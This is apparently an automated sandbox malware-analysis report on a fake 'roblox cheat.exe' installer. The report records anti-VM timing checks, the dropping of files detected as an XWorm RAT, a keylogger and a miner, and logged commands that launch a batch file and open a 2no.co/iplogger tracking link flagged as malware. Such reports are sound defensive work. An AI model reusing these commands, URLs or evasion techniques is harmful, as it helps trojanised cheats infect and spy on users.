            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeRDTSC instruction interceptor: First address: B039F0 second address: B03A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: 1A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: 32E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeWindow / User API: threadDelayed 9941Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1905
            Source: C:\Users\user\Desktop\roblox cheat.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 7176Thread sleep time: -44236s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 7176Thread sleep time: -52370s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 7176Thread sleep time: -39675s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75456B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF75456B190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545540BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7545540BC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75457FCA0 FindFirstFileExA,3_2_00007FF75457FCA0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545716A4 VirtualQuery,GetSystemInfo,3_2_00007FF7545716A4
            Source: C:\Users\user\Desktop\roblox cheat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeThread delayed: delay time: 44236Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeThread delayed: delay time: 52370Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeThread delayed: delay time: 39675Jump to behavior
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drBinary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: roblox cheat.exe, 00000000.00000002.1348520885.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000002.1365901576.00000228251F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
            Source: roblox cheat.exe, 00000000.00000002.1348520885.0000000001571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yH+
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D1E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D1E378
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D3D0F8 mov eax, dword ptr fs:[00000030h]2_2_00D3D0F8
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D343AC mov ecx, dword ptr fs:[00000030h]2_2_00D343AC
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D3D13C mov eax, dword ptr fs:[00000030h]2_2_00D3D13C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754580D20 GetProcessHeap,3_2_00007FF754580D20
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D12F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D12F78
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D1E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D1E378
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545776D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF7545776D8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754573170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF754573170
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754573354 SetUnhandledExceptionFilter,3_2_00007FF754573354
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754572510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF754572510
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75456B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF75456B190
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe" Jump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545858E0 cpuid 3_2_00007FF7545858E0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF75456A2CC
            Source: C:\Users\user\Desktop\roblox cheat.exeQueries volume information: C:\Users\user\Desktop\roblox cheat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D13495 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00D13495
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545551A4 GetVersionExW,3_2_00007FF7545551A4
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Native API            		1
            Scripting            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            Input Capture            		1
            System Time Discovery            		Remote Services12
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop Protocol1
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		1
            Obfuscated Files or Information            		Security Account Manager136
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder            		21
            Software Packing            		NTDS221
            Security Software Discovery            		Distributed Component Object ModelInput Capture5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484380 Sample: roblox cheat.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 90 52 titanium.roblox.com 2->52 54 edge-term4.roblox.com 2->54 56 4 other IPs or domains 2->56 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 Antivirus detection for dropped file 2->76 78 9 other signatures 2->78 10 roblox cheat.exe 4 2->10         started        signatures3 process4 file5 34 C:\Users\user\...\robloxPX1instaler.exe, PE32 10->34 dropped 36 C:\...\cheatinstaler cheatinstalerF6R54T.exe, PE32+ 10->36 dropped 38 C:\Users\user\...\roblox cheat.exe.log, ASCII 10->38 dropped 13 cheatinstaler cheatinstalerF6R54T.exe 11 10->13         started        16 robloxPX1instaler.exe 12 10->16         started        process6 dnsIp7 40 C:\Users\user\AppData\Local\...\Keyloger.exe, PE32 13->40 dropped 42 C:\Users\user\AppData\...\BitCoin_miner.exe, PE32 13->42 dropped 44 C:\Users\user\AppData\Local\...\msedge.exe, PE32 13->44 dropped 20 cmd.exe 1 14 13->20         started        46 edge-term4-ams2.roblox.com 128.116.21.3, 443, 49708 ROBLOX-PRODUCTIONUS United States 16->46 48 d2v57ias1m20gl.cloudfront.net 18.239.18.85, 443, 49711, 60763 AMAZON-02US United States 16->48 50 127.0.0.1 unknown unknown 16->50 70 Tries to detect virtualization through RDTSC time measurements 16->70 file8 signatures9 process10 process11 22 chrome.exe 9 20->22         started        25 cmd.exe 1 20->25         started        27 conhost.exe 20->27         started        dnsIp12 58 192.168.2.10 unknown unknown 22->58 60 192.168.2.6 unknown unknown 22->60 62 3 other IPs or domains 22->62 29 chrome.exe 22->29         started        32 conhost.exe 25->32         started        process13 dnsIp14 64 counter.yadro.ru 88.212.201.198, 443, 49720, 49727 UNITEDNETRU Russian Federation 29->64 66 www.google.com 142.250.186.132, 443, 49729, 60766 GOOGLEUS United States 29->66 68 3 other IPs or domains 29->68

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            roblox cheat.exe61%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            roblox cheat.exe100%AviraTR/Dropper.Gen
            roblox cheat.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\Keyloger.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe61%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.firmaprofesional.com/cps00%URL Reputationsafe
            http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
            http://www.quovadisglobal.com/cps00%URL Reputationsafe
            https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.76548284495356820%Avira URL Cloudsafe
            https://iplogger.org/0%Avira URL Cloudsafe
            http://crl.securetrust.com/SGCA.crl0%Avira URL Cloudsafe
            http://www.winimage.com/zLibDll1.2.11rbr0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0%Avira URL Cloudsafe
            https://setup.rbxcdn.comw0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl00%URL Reputationsafe
            https://cdn.iplogger.org/redirect/handshake.png0%Avira URL Cloudsafe
            http://repository.swisssign.com/0%URL Reputationsafe
            https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
            https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun0%Avira URL Cloudsafe
            http://www.accv.es/legislacion_c.htm0U0%URL Reputationsafe
            https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
            http://ocsp.accv.es00%URL Reputationsafe
            http://www.quovadisglobal.com/cps0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%URL Reputationsafe
            http://crl.certigna.fr/certignarootca.crl010%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            http://www.accv.es000%URL Reputationsafe
            http://tools.medialab.sciences-po.fr/iwanthue/index.php0%Avira URL Cloudsafe
            https://client-telemetry.roblox.com30%Avira URL Cloudsafe
            https://client-telemetry.roblox.com0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper30%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0%Avira URL Cloudsafe
            https://a.nel.cloudflare.com/report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B0%Avira URL Cloudsafe
            https://2no.co/24RXx6H100%Avira URL Cloudmalware
            https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f832290%Avira URL Cloudsafe
            https://setup.rbxcdn.com0%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl0%Avira URL Cloudsafe
            http://www.roblox.com/0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerblox0%Avira URL Cloudsafe
            https://iplogger.org/privacy/0%Avira URL Cloudsafe
            http://ocsp.accv.es0%Avira URL Cloudsafe
            http://www.roblox.com0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS0%Avira URL Cloudsafe
            https://client-telemetry.roblox.cominatorey0%Avira URL Cloudsafe
            https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/logo-dark.png0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64p0%Avira URL Cloudsafe
            https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/brand.png0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloadsr0%Avira URL Cloudsafe
            https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.76548284495356820%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbees0%Avira URL Cloudsafe
            https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperLMEMX0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.0%Avira URL Cloudsafe
            http://www.accv.es/legislacion_c.htm0%Avira URL Cloudsafe
            http://www.roblox.com/_1J0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerp0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerons0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl00%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio640%Avira URL Cloudsafe
            https://iplogger.org/rules/0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerocal0%Avira URL Cloudsafe
            http://bit.ly/1eMQ42U0%Avira URL Cloudsafe
            http://www.cert.fnmt.es/dpcs/0%Avira URL Cloudsafe
            https://s3.amazonaws.com/0%Avira URL Cloudsafe
            https://2no.co/100%Avira URL Cloudmalware
            https://clientsettingscdn.roblox.com/v2/settings0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbe0%Avira URL Cloudsafe
            https://2no.co/redirect-2100%Avira URL Cloudmalware
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            counter.yadro.ru
            		88.212.201.198
            		truefalse
              		unknown
              a.nel.cloudflare.com
              		35.190.80.1
              		truefalse
                		unknown
                edge-term4-ams2.roblox.com
                		128.116.21.3
                		truefalse
                  		unknown
                  2no.co
                  		104.21.79.229
                  		truefalse
                    		unknown
                    cdn.iplogger.org
                    		104.21.4.208
                    		truefalse
                      		unknown
                      www.google.com
                      		142.250.186.132
                      		truefalse
                        		unknown
                        d2v57ias1m20gl.cloudfront.net
                        		18.239.18.85
                        		truefalse
                          		unknown
                          ecsv2.roblox.com
                          		unknown
                          		unknownfalse
                            		unknown
                            clientsettingscdn.roblox.com
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682false
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.iplogger.org/redirect/handshake.pngfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://a.nel.cloudflare.com/report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9Bfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://2no.co/24RXx6false
                                		unknown
                                https://cdn.iplogger.org/favicon.icofalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682false
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://setup.rbxcdn.comwrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
